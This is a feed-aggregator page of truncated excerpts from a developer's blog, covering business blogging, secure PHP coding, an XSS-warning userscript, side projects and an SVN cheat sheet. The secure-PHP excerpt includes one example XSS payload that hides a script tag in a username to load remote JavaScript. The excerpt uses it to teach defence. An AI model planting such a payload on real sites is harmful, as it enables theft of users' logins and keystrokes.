What is Toluu?
Toluu is a free service for sharing the feeds you read and discovering new ones.		 Get Invite

AddedBytes.com

AddedBytes.com, formerly ILoveJackDaniels.com, is the online playground of Dave Child, an ecommerce manager and web developer from Brighton, on the south coast of the UK.


Blogging in BusinessNovember 14

When I started at Active Parity, one of the first things I wanted to do was help the company to get a blog started. They're a great way to show off your knowledge and communicate with clients. My first post over on the new blog is up, and it's on exactly that subject: Blogging in Business - specifically, why businesses should blog and what the potential downsides are. The first of many posts over there, I'm sure!

Writing Secure PHP, Part 4September 11

In Writing Secure PHP, Writing Secure PHP, Part 2 and Writing Secure PHP, Part 3 I covered many of the common mistakes PHP developers make, and how to avoid some potential security problems. This article covers some of the more advanced security problems common to PHP on the web.

[Writing Secure PHP is a series. Part 1, Part 2 and Part 3 are currently also available.]

Cross-Site Scripting (XSS)

Cross-site scripting (often abbreviated to XSS) is a form of injection, where an attacker finds a way to have the target site display code they control. In its most basic form, this can be as simple as a site that allows HTML characters in usernames, where someone can specify a username like:

  1. DaveChild<script type="text/javascript" src="http://www.example.com/my_script.js"></script>

Now, whenever someone sees my username on the target site, the script I've added to my username will run. I could potentially use this to grab the person's login information, log their keystrokes - any number of nefarious activities.

As a d

XSS Alarm UserscriptSeptember 11

Cross-Site Scripting (also known as XSS) is a security concern for any site that allows user input, especially e-commerce stores and anyone using or collecting sensitive personal information. In very basic terms, XSS is when a third party manages to have the target site load and show to a user a script or iframe they control. It allows the attacker to steal cookies, log keystrokes and more.

Unfortunately, while as a developer there is plenty you can do you make your web application secure against XSS, as a customer/user there is very little you can do to keep yourself safe. All you can really do is make sure you don't give out personal details or buy online from anywhere but the most reputable stores. And maybe watch your browser's "loading" bar like a hawk. Or maybe sniff your own HTTP traffic.

No browsers (that I know of) provide any method for prevention of third party scripts or iframes from loading. Let's face it - as long as advertising exists, that's unlikely to change. You can turn all JavaScript off, but that doesn't protect you against iframe-based XSS, and obviously degrades (for the most part) your web experience.

What I wanted was something to warn me when my browser was loading scripts from a third party. (Actually, what I really wanted was something to allow me to decide whether to load them or not.) Once a script from a third party has loaded, it may be too late to do anything - personal information may have already been taken - howe

Personal Development: To DoAugust 21

On Hacker News, ambition posted a to-do list inspired by / taken from this excellent bit of advice from Chris Wanstrath. Which got me thinking about what I want to work on and with in my spare time.

I've been meaning to organise my side-projects better. Like everyone else, I have lots of ideas and little time to make anything of them. I have a folder packed with projects at 95% completion, sitting there unloved because I got distracted, or found something better to use.

The problem with that is that taking projects to 95% is ultimately demotivating. It breeds guilt, and that's not helpful. And a project at 95% doesn't pay you back for the time you put in to it. You eventually need to release something if you don't want to end up looking back and seeing missed opportunities and wasted time.

In addition to a collection of projects on the go and ideas, there are technical skills I want to develop. I'm learning Python, and Linux server administration. I'm interested in looking into Objective-C and Cocoa. jQuery is great but I need more time with it. My "Dave! Play with PostgreSQL!" post-it is faded it's been on my wall for so long. And I need to stay sharp with the languages and technologies I use day-to-day.

Some fat needs to be trimmed.

I need to leave time for new things, too. Stuff I've not heard of

Subversion Cheat SheetAugust 7

Overview

mod_rewrite Cheat Sheet Version 2 The Subversion (SVN) cheat sheet is a one-page reference sheet for Subversion on the command line.

If you like the cheat sheets, and want to say thanks, please consider buying me something from my Amazon Wishlist. Thankyou very much to those who have already hunted it down and sent me something - I'm very grateful!

Much of the content on this cheat sheet is based on the excellent SVN Book, available at http://svnbook.red-bean.com/. This is the first cheat sheet created with the involvement of the Cheat Sheets Google Group. Many thanks to Alan Switzer and Randy Merrill for their suggestions and feedback. Finally, thanks also to the 210 people who requested this cheat sheet!

Downloads